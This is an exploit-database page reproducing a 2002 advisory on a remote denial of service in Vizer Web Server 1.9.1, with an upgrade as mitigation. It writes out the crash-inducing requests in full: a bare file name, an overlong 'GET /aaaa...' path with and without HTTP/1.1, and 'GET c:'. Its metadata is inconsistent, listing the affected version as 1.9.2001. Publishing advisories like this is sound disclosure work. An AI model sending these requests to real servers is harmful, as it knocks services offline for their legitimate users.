header-logo
Suggest Exploit
vendor:
Vizer Web Server
by:
SecurityFocus
7.5
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: Vizer Web Server
Affected Version From: 1.9.2001
Affected Version To: 1.9.2001
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Vizer Web Server Remote Denial of Service Vulnerability

It has been reported that Vizer Web Server may be prone to a remote denial of service vulnerability that may allow an attacker to cause the affected server to crash, denying service to legitimate users. Vizer Web Server 1.9.1 has been reported to be affected by this issue. An attacker can exploit this vulnerability by sending a specially crafted request such as index.htm without specifying GET and HTTP, GET /aaaaaa[ 250 of a ]aaa HTTP/1.1 specifying GET and HTTP, GET /aaaaaa[ 250 of a ]aaa specifying only GET, or GET c: specifying only GET.

Mitigation:

Upgrade to the latest version of Vizer Web Server.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9678/info

It has been reported that Vizer Web Server may be prone to a remote denial of service vulnerability that may allow an attacker to cause the affected server to crash, denying service to legitimate users.

Vizer Web Server 1.9.1 has been reported to be affected by this issue.

index.htm
( without specifying GET and HTTP )

or:

GET /aaaaaa[ 250 of a ]aaa HTTP/1.1
( specifying GET and HTTP )

GET /aaaaaa[ 250 of a ]aaa
( specifying only GET )

or:

GET c:( specifying only GET )

Navigation

Suggest Exploit

Services By CQR